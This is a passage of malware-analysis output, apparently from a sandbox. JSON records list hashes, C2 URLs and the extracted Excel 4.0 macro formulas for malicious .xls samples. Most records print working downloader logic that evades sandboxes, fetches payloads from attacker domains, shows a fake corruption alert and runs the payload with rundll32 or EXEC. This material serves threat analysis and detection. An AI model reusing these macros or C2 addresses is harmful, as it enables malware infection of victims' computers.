Macro","attr":{"formulas":"SUM(0.001,0.001,0.001,0.001,0.001,0.001,0.001,0.001,0.001,0.001)\nSUM(R$10C$1,R$10C$4,R$10C$7,R$10C$10,R$10C$13,R$10C$16,R$10C$19,R$10C$22,R$10C$25,R$10C$28)\nSUM(R$11C$1,R$11C$4,R$11C$7,R$11C$10,R$11C$13,R$11C$16,R$11C$19,R$11C$22,R$11C$25,R$11C$28)\nSUM(R$12C$1,R$12C$4,R$12C$7,R$12C$10,R$12C$13,R$12C$16,R$12C$19,R$12C$22,R$12C$25,R$12C$28)\nSUM(R$13C$1,R$13C$4,R$13C$7,R$13C$10,R$13C$13,R$13C$16,R$13C$19,R$13C$22,R$13C$25,R$13C$28)\nSUM(R$14C$1,R$14C$4,R$14C$7,R$14C$10,R$14C$13,R$14C$16,R$14C$19,R$14C$22,R$14C$25,R$14C$28)\nSUM(R$15C$1,R$15C$4,R$15C$7,R$15C$10,R$15C$13,R$15C$16,R$15C$19,R$15C$22,R$15C$25,R$15C$28)\nSUM(R$16C$1,R$16C$4,R$16C$7,R$16C$10,R$16C$13,R$16C$16,R$16C$19,R$16C$22,R$16C$25,R$16C$28)\nSUM(R$17C$1,R$17C$4,R$17C$7,R$17C$10,R$17C$13,R$17C$16,R$17C$19,R$17C$22,R$17C$25,R$17C$28)\nSUM(R$18C$1,R$18C$4,R$18C$7,R$18C$10,R$18C$13,R$18C$16,R$18C$19,R$18C$22,R$18C$25,R$18C$28)\nSUM(R$9C$2,R$9C$5,R$9C$8,R$9C$11,R$9C$14,R$9C$17,R$9C$20,R$9C$23,R$9C$26,R$9C$29)\nSUM(R$10C$2,R$10C$5,R$9C$8,R$9C$11,R$9C$14,R$10C$17,R$9C$20,R$10C$23,R$9C$26,R$9C$29)\nSUM(R$11C$2,R$11C$5,R$9C$8,R$9C$11,R$9C$14,R$10C$17,R$9C$20,R$10C$23,R$9C$26,R$9C$29)\nSUM(R$12C$2,R$12C$5,R$9C$8,R$9C$11,R$9C$14,R$10C$17,R$9C$20,R$10C$23,R$9C$26,R$9C$29)\nSUM(R$13C$2,R$13C$5,R$9C$8,R$9C$11,R$9C$14,R$10C$17,R$9C$20,R$10C$23,R$9C$26,R$9C$29)\nSUM(R$14C$2,R$14C$5,R$9C$8,R$9C$11,R$9C$14,R$10C$17,R$9C$20,R$10C$23,R$9C$26,R$9C$29)\nSUM(R$15C$2,R$15C$5,R$9C$8,R$9C$11,R$9C$14,R$10C$17,R$9C$20,R$10C$23,R$9C$26,R$9C$29)\nSUM(R$16C$2,R$16C$5,R$9C$8,R$9C$11,R$9C$14,R$10C$17,R$9C$20,R$10C$23,R$9C$26,R$9C$29)\nSUM(R$17C$2,R$17C$5,R$9C$8,R$9C$11,R$9C$14,R$10C$17,R$9C$20,R$10C$23,R$9C$26,R$9C$29)\nSUM(R$18C$2,R$18C$5,R$9C$8,R$9C$11,R$9C$14,R$10C$17,R$9C$20,R$10C$23,R$9C$26,R$9C$29)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7aa29c3e9380f8fb69ee9390180138b9122dc2dcd2b8c9d74e0451183f21b47e"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7aa29c3e9380f8fb69ee9390180138b9122dc2dcd2b8c9d74e0451183f21b47e","filesize":221184,"md5":"33b54197c933bd0ac2278626d18466b3","sha1":"bd3dbbcfaa0ff3696f2cbbb57fe2ac2b936a0610","sha256":"7aa29c3e9380f8fb69ee9390180138b9122dc2dcd2b8c9d74e0451183f21b47e","sha512":"053208d41628c220bbff0be8cb1f96d70005c0bf66599cf33810f17ec0352de20846a47f79791d8a7ac8af5c3b1eb67e2a03dbc12d36307978c8ed34e1e55f09","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7aa29c3e9380f8fb69ee9390180138b9122dc2dcd2b8c9d74e0451183f21b47e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NKWPFm2pNl\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7ab798822ac2b335302efc1865081f875e4ea355121af4a6e712cba833f987be"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7ab798822ac2b335302efc1865081f875e4ea355121af4a6e712cba833f987be","filesize":113664,"md5":"fe79ae5eaf0f58254eb604d0f83bf1d5","sha1":"da3f0a7db216a40586a17a6858bb03869d90d6e4","sha256":"7ab798822ac2b335302efc1865081f875e4ea355121af4a6e712cba833f987be","sha512":"128e81998da4cab92c19a13cb7780306409c0431b74ab0cd9bf37e273b650bfbad6cb9a83b907d52c30e65fad2a672735d85ca20ec52e4e4ed02bcf91cba09f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7ab798822ac2b335302efc1865081f875e4ea355121af4a6e712cba833f987be.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"ArWjp4ySY0\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7abf1b9aad6d4f0dfcd5af573f02ae7572c8953110b1efec17246dc77a5f7169"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7abf1b9aad6d4f0dfcd5af573f02ae7572c8953110b1efec17246dc77a5f7169","filesize":206336,"md5":"7c0afa3b2b892daa9b61cc79a348e63f","sha1":"0deb0dbe36bacf33134fd9368f40a333fd56dee8","sha256":"7abf1b9aad6d4f0dfcd5af573f02ae7572c8953110b1efec17246dc77a5f7169","sha512":"39f010078e9e791876b753249dea9fcb702feb24611a31a2e81e7ce9e9d3c7440f57440257badaa44a140e456da016b87111351035f348b4dd202251c97b3017","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7abf1b9aad6d4f0dfcd5af573f02ae7572c8953110b1efec17246dc77a5f7169.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MC6sEqWAp4\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7adde92940edd41f0876d57cb7902da1b1fab15a5925630a841ad09500c7db3f"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7adde92940edd41f0876d57cb7902da1b1fab15a5925630a841ad09500c7db3f","filesize":209920,"md5":"e97fcbc3bade6290f8276af0cded5946","sha1":"0e132ef656fc065bff07b155bb8fc9e280c96619","sha256":"7adde92940edd41f0876d57cb7902da1b1fab15a5925630a841ad09500c7db3f","sha512":"6bc6f1af78694593a40ef0fa80850ba9192128e7ed819fb260b425e6277e53ccc6170da22109e388ce91ee9bf4ea35255f88078cfc24d12e9718ce422c8edb95","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7adde92940edd41f0876d57cb7902da1b1fab15a5925630a841ad09500c7db3f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qEXKfVr5GI\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7ae9cfca43876bfbb400061bb1fe11cb4ac22a1ee7794ec1a03d54175885a5d8"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7ae9cfca43876bfbb400061bb1fe11cb4ac22a1ee7794ec1a03d54175885a5d8","filesize":116224,"md5":"4a3faeb1776b442294321da8cfe97a8c","sha1":"4da361a72f4aa62c89578da0ac637ceab6638775","sha256":"7ae9cfca43876bfbb400061bb1fe11cb4ac22a1ee7794ec1a03d54175885a5d8","sha512":"54b202ced2514297f6f393f1a6db1dde79930b9277dea8d51344339d53820a118d144dbbf0f6dd1ee9280b8d78d8cbefbb381738165116ec34a609942d8ee020","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7ae9cfca43876bfbb400061bb1fe11cb4ac22a1ee7794ec1a03d54175885a5d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GRS1c29kZQ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7af3def6d575dc828f81d16816487390e988f141ff6b7f50338995fc2d5b687f"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7af3def6d575dc828f81d16816487390e988f141ff6b7f50338995fc2d5b687f","filesize":206336,"md5":"7436e563a6e70b5577015a10525e05cb","sha1":"fa01f79e73316fc9b00ac868147abb1c23c10503","sha256":"7af3def6d575dc828f81d16816487390e988f141ff6b7f50338995fc2d5b687f","sha512":"91286cd09e7eb8e1e795824ac308ee97bab36abd9d5e3ac4cf5b8770eda5c0948a18501eace67db7e0d7c067a6723910d7977cea44076ca6f3d06134352cad87","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7af3def6d575dc828f81d16816487390e988f141ff6b7f50338995fc2d5b687f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"k6fmWEybG2\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7af42ac0f36796ffda4ec94075969b019c1ddee1d8a64e14420bd772a1e95e85"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7af42ac0f36796ffda4ec94075969b019c1ddee1d8a64e14420bd772a1e95e85","filesize":214528,"md5":"646c7a7c81e1dda368bad2f2710184df","sha1":"437b336c6230c9d1b50956746131662af8bded97","sha256":"7af42ac0f36796ffda4ec94075969b019c1ddee1d8a64e14420bd772a1e95e85","sha512":"8c8037f6be2a369390c641b9e836b32f04a95ec821d954ff731bdf4824e193eaedfbed00ec09ad92de872beba06e16d417419bbad1e4a97c198edc5c10480714","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7af42ac0f36796ffda4ec94075969b019c1ddee1d8a64e14420bd772a1e95e85.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7amD49YVNO\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7af4931e8d194c50ef36b6b9962a25269b5e2fc42e02ecf00aeb2c7f2b816fed"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7af4931e8d194c50ef36b6b9962a25269b5e2fc42e02ecf00aeb2c7f2b816fed","filesize":167936,"md5":"740332764ead98ed77b708be70e3b7bb","sha1":"ba143c948f2c7ef375a11b031dd6df59db415dad","sha256":"7af4931e8d194c50ef36b6b9962a25269b5e2fc42e02ecf00aeb2c7f2b816fed","sha512":"c12a5957c83e8455fc711b490bc931484c95dcd619d01563d2b4faa05d515b1aa8a8d254464c02b68fe6878157a3e48f22e31fa6d891c852f92ec3fb11556146","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7af4931e8d194c50ef36b6b9962a25269b5e2fc42e02ecf00aeb2c7f2b816fed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kf015G25BK\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b0a45cfa5d549d652cca7f33536299839df6a8b1d95e78515dbdbe53af13cb6"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7b0a45cfa5d549d652cca7f33536299839df6a8b1d95e78515dbdbe53af13cb6","filesize":113664,"md5":"f5d4e54b37ea80149794da4891437d4c","sha1":"0f140bb60ad2e747ede7fa79472641e826382ff8","sha256":"7b0a45cfa5d549d652cca7f33536299839df6a8b1d95e78515dbdbe53af13cb6","sha512":"99d8ea90525a779707001957d949444f13dce2efeb29209d084be163752264ddd86ade7be102916e07c532233989215f7e050b93080cf13587e1cfa72c6147d5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b0a45cfa5d549d652cca7f33536299839df6a8b1d95e78515dbdbe53af13cb6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"zYWB9Xn3Vl\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b30c4ff5df9caa57414858be16507a4debaac2a3672fb06b600a7cdeaa848f5"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7b30c4ff5df9caa57414858be16507a4debaac2a3672fb06b600a7cdeaa848f5","filesize":112640,"md5":"9f5db1ada0f76817ac0c25c08e9e83d9","sha1":"e385ad16dba9bd70f56a13531bba1e0c06036b42","sha256":"7b30c4ff5df9caa57414858be16507a4debaac2a3672fb06b600a7cdeaa848f5","sha512":"e98f1f21ee8a9ebafd339ac87b4c9b7680cc86746d20cdc2a0520be465c404c1a04df18f4e868b17154ff14bb8897f9fb856f3c1718d7db60d6aff467744c6ef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b30c4ff5df9caa57414858be16507a4debaac2a3672fb06b600a7cdeaa848f5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b328bec0092320b21a78faaf2763e624ab3079c70a3039465e6c454de3190c5"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7b328bec0092320b21a78faaf2763e624ab3079c70a3039465e6c454de3190c5","filesize":209920,"md5":"9ab35e9c310ed077563f15536cd4f78b","sha1":"01b8988e95665b362d347bd6a03e0d143876ccfe","sha256":"7b328bec0092320b21a78faaf2763e624ab3079c70a3039465e6c454de3190c5","sha512":"0d3897ebdca899fd27823f444fb5ab4143de527d66a4b6e51205fcfa546e6fd87cc8771a17f29bc8540943c6408363a04f86efb540c2a366548751026dda9bff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b328bec0092320b21a78faaf2763e624ab3079c70a3039465e6c454de3190c5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 